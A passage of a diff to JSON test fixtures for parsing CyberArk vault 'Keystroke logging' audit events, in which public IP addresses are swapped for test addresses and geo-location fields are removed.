System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", "action": "keystroke logging", @@ -518,39 +452,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -567,7 +480,7 @@ }, "@timestamp": "2021-03-15T10:35:08.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -578,16 +491,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:35:08Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:35:08\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:35:08Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:35:08\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:35:08Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Keystroke logging", "issuer": "Administrator", "extra_details": { @@ -601,14 +513,14 @@ "managed_account": "Yes", "psmid": "PSMServer", "session_id": "8b3d0b38-aef5-49d9-bdd7-d57706887d8b", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "command": "sudo su" }, "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "success", "policy_id": "UnixSSH", 
@@ -618,9 +530,9 @@ "last_success_verification": "1615803764", "last_task": "VerifyTask" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "Keystroke logging", "timestamp": "Mar 15 03:35:08", "desc": "Keystroke logging" 
@@ -631,8 +543,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.191941800Z", - "original": "\u003c5\u003e1 2021-03-15T10:35:08Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:35:08\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:35:08Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:35:08\",\"IsoTimestamp\":\"2021-03-15T10:35:08Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\",\"Message\":\"Keystroke 
logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:37:00.165114900Z", + "original": "\u003c5\u003e1 2021-03-15T10:35:08Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 03:35:08\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T10:35:08Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1615803764\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 15 03:35:08\",\"IsoTimestamp\":\"2021-03-15T10:35:08Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"361\",\"Desc\":\"Keystroke logging\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Keystroke logging\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=sudo 
su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\",\"Message\":\"Keystroke logging\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1615803764\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "361", "kind": "event", "action": "keystroke logging", @@ -654,39 +566,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -703,7 +594,7 @@ }, "@timestamp": "2021-03-15T14:11:18.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -714,16 +605,15 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T14:11:18Z", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:11:18\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:11:18Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 07:11:18\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T14:11:18Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e361\u003c/MessageID\u003e\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n 
\u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003eCommand=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\u003c/ExtraDetails\u003e\n \u003cMessage\u003eKeystroke logging\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615814025\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UseSudoOnReconcile\" Value=\"Yes\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Keystroke logging", "issuer": "Administrator", "extra_details": { @@ -737,8 +627,8 @@ "managed_account": "Yes", "psmid": "PSMServer", "session_id": "27f74dce-f5d5-4c94-bf99-ca6aafe2c518", - "src_host": "81.32.170.205", - "dst_host": "34.123.103.115", + "src_host": "67.43.156.13", + "dst_host": "67.43.156.15", "command": "sudo su" }, "rfc5424": true, @@ -746,7 +636,7 @@ "other": { "use_sudo_on_reconcile": "Yes" }, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", @@ -759,9 +649,9 @@ "cpm_error_details": "First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031", "last_fail_date": "1615814025" }, - "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark", + "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark", "safe": "partner", - "station": "34.71.250.247", + "station": "67.43.156.15", "action": "Keystroke logging", "timestamp": "Mar 15 07:11:18", "desc": "Keystroke logging" 
@@ -772,8 +662,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:34.192007800Z", - "original": "\u003c5\u003e1 2021-03-15T14:11:18Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 15 07:11:18\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-15T14:11:18Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e361\u003c/MessageID\u003e\\n \u003cDesc\u003eKeystroke logging\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eKeystroke logging\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating 